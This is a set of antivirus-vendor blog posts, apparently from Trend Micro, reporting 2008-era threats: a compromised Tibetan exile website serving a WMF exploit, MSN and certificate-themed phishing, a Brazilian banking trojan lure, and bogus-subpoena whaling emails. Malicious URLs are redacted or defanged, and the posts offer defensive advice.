Latest Antivirus Updates

Many of you may know AVG Anti-Virus either because you use their free or paid-for package to protect your machine from malicious invasions. Today the company has released an updated version of the free edition of its anti-virus software.AVG Anti-Virus Free 8.0 has had some significant changes over the previous version. First of all the interface has totally changed and now looks like the paid-for alternative. A new addition is also a version of LinkScanner, which integrates with your web browser and highlights links in search results …

Late last week, Trend Micro Senior Threat Researcher Paul Ferguson reported a Web site compromised by a malicious JavaScript that links users to a known Graphical Device Interface (GDI) exploit.

You may recall that this critical exploit gives the remote user complete control over vulnerable systems once a specially crafted .EMF or .WMF image file is executed. The compromised site is the official Web site of the Tibetan government in exile.

Visitors to that site would unwittingly download an embedded malicious JavaScript:

http://www.tibet.com/{BLOCKED}/tibet.js

A closer look at the script reveals that it refers to the following sites containing iFrame tags pointing to malware files and the GDI exploit:

• http://ad.{BLOCKED}.googlepages.com/ad02.jpg - the GDI/WMF exploit file, which Trend Micro detects as HTML_EXP.AZ
• http://ad.{BLOCKED}.googlepages.com/rm03.html - the obfuscated JS file, which is detected as HTML_EXP.AA
• http://ad.{BLOCKED}.googlepages.com/142.htm - the obfuscated Visual basic (VB) script, which is detected as as VBS_VBSWGBASE.BH

Trend Micro detects the JS file, tibet.js, as HTML_IFRAME.OB.

Obviously, cyber criminals are still finding issues concerning Tibet, China, and the Olympics to be hot. TrendLabs has documented a couple of such occurences here and here.

One may take this as just another case of one party going head-to-head with an opposing party using malware. It is easy to point to hacktivists with political agendas, with the news of Chinese hackers supposedly launching a distributed Denial-of-Service attack surfaced during the weekend. The attack was in protest against a CNN coverage that was deemed “pro-Tibet,” but the said attack never transpired. Anti-CNN.com, a Chinese Web site created solely for the purpose of exposing the Western news company’s “biases,” urged street protests in European countries.

Though no proof was established regarding the connection between the anti-CNN movement and the supposed hacking incident, a team who had been investigating Chinese hackers believed that the online attacks should supposedly go hand-in-hand with the street protests. Think of it as a synchronized protest in the real and digital worlds. CNN has already released a statement regarding their Tibet coverage.

Chinese hackers did, however, manage to disrupt the SportsNetwork Web site, as reported here on TechCrunch.

Keep patches up to date to protect your systems from being exploited. At the same time, Trend Micro implores users to regularly update pattern files for improved system protection. Note that all related malicious Web sites are already blocked by the Content Security Team.

ShareThis

Do you know the story where a human and a monkey lived in two rooms separated by a single door?

The first part of the story says that after a while in that room, the human started to get curious and decided to find out what was happening behind the door. As the human peeked through the keyhole, what he saw was another eye, which apparently was the monkey’s.

Cyber criminals can use the simplest of methods and maximum yield by simply exploiting human curiosity. How?

The first step is to send a spam email message. This message is supposedly sent through well-known botnet infrastructure.

The message above was sent in German but it could be sent in any language. The message above reads “With our completely free service, you can find out whoever blocked you in MSN or deleted” in English.

The link opens a Web site that includes the invitation to use the free service to check the validity of the MSN account.

All the user has to do here is “to peek through the keyhole” by typing the MSN account and the right password to figure out if his account is “indeed blacklisted”. Of course no answer comes back but…What happens then?

If the data entered in these fields are valid then the user could be considered an accomplice for the next criminal actions done by the users of the engellembul@gmail.com mailbox, the mailbox where the data is sent.

This gives cyber criminals a free choice to use their unlawfully acquired data in any of their illicit activities. The hacked MSN account can be used to send out spam, distribute malware both through email and the instant messaging application, MSN Messenger. Apart from this, the unauthorized user will then have access to the mailbox and can gather personal data about the affected user.

ShareThis

This week, we’ve received some reports related to a new malware attack regarding a tragedy that has early this month: a five-year-old child was thrown out of a window. The police are investigating the tragedy and the latest reports say that all evidences indicate the parents as the ones responsible.

Hackers sent the spammed email message below, where they promise a video with new and exclusive information regarding the case, including findings about who the suspects are.

Figure 1: Email message promising to reveal the responsible parties of the murder

The link in the mail has an obscured address (hxxp://83.x.x.136/terranoticias/index.html) to a fake page from a big and legitimate ISP in Brazil (Terra Networks):

Figure 2: Fake page from a Legitimate Brazilian ISP

After the user clicks the link promising the video, the browser instead tries to download the file verdade.com.

Figure 3: Download dialog box

This file is detected by Trend Micro as TROJ_BANLOAD.EOZ. Users who have Trend Micro protection have been safe from this threat from the beginning, as Web Reputation Services (WRS) proactively recognizes the fake Web site.

ShareThis

A computer virus that struck the San Diego Superior Court system last week has been identified and contained, but court computers continue to be shut down while the problem is fixed, officials said Monday.Court officials are asking the public for patience and are urging those who need information to have their court-issued paperwork, courtesy notices or tickets with them when they come to court.The "Win32/Zilcat.A" virus was first identified last week by anti- virus companies, and at the time there was no known cure.It has estimated t …

Researchers have recently discovered the plausibility of hacking a computer chip for unauthorized users to have backdoor access to a system. Microprocessors now join the list of devices that can be hacked, following printers, digital photo frames, pacemakers, and even cars.

In a report by PC World, a microprocessor was hacked by altering a number of circuits on the chip. The modification results to an injection into the microchip’s memory of a malicious firmware. This enables a hacker to log into the system as a legitimate user. This attack, when successfully done, is virtually untraceable to the affected user.

Researchers who discovered this approach described possible scenarios of attack such as the code being added into the chips during development, or the modified chips being installed during computer assembly. This is highly probable as what the trends have shown: the security of new hardware is no longer a certainty with off-the-shelf malware from newly acquired devices such as USB keys, MP3 players, and even the celebrated iPod.

With the required resources to complete such an attack, this microprocessor hacking method might not end up to be every hacker’s weapon of choice. But I reckon that given the resources and under the right circumstances, it will be someone’s choice — then it would be like a robber getting his own set of keys to a house even before the real owner moves in.

ShareThis

A digital certificate is an electronic “credit card” that establishes your credentials when doing business or other transactions on the Web. This certificate is being used by many banks for secure online banking.

Unfortunately, hackers and phishers have easily adapted to this security technique.

A recent phishing attack using digital certificates was seen in the Bank of America case. In order to access the Bank of America Direct login page, the client must have a valid digital certificate installed on their personal computer. The URLs, in rockphish form, lead the user to a page asking them to create a certificate or to download the digital certificate. In Internet Explorer, it asks the user to run a Microsoft ActiveX control called “Microsoft Certificate Enrollment Code.”

After running the add-on and upon filling up the required information, it asks the user to download an .EXE file, sophialite.exe.

This is quite clever. From the explicit display of login or confirmation page that is easily verified as phishing, they have turned to the creation of digital certificates, a ploy that can actually convince users to take the bait. Another thing, these URLs are in rockphish form; as of now we already have 93 different domains using this technique. All are blocked by WCS (Trend’s Web Classification System for blocking malicious domains and URLs).

ShareThis

In this recently reported targeted attack on CEOs of various companies (also known as “whale phishing,” due to the size and stature of the affluent targets), a bogus subpoena request attempts to trick recipients into clicking a link in the spammed email messages. The link purports to give users access to the related court documents in a bogus subpoena action.

If victims do click on the malicious link in the email, they will arrive at the Web site pretending to house the information (shown above), then prompted to download and install a browser plug-in to proceed in viewing the files.

The malicious “browser plug-in” (named Acrobat.exe in this instance) is actually TROJ_AGENT.AMAL.

The attack seems to work due to various social engineering techniques, each of which is not necessarily new.

The United States District Court has posted an advisory regarding these bogus subpoena requests, and so has the Internet Crime Complaint Center (IC3).

Anyone receiving such a request is thus advised to treat this solicitation with extreme caution. If there is reason to believe that the email is valid, consult the matter with your lawyer. Do not click on links in unsolicited email. Period.

Additional input from Paul Ferguson, Advanced Threats Research

ShareThis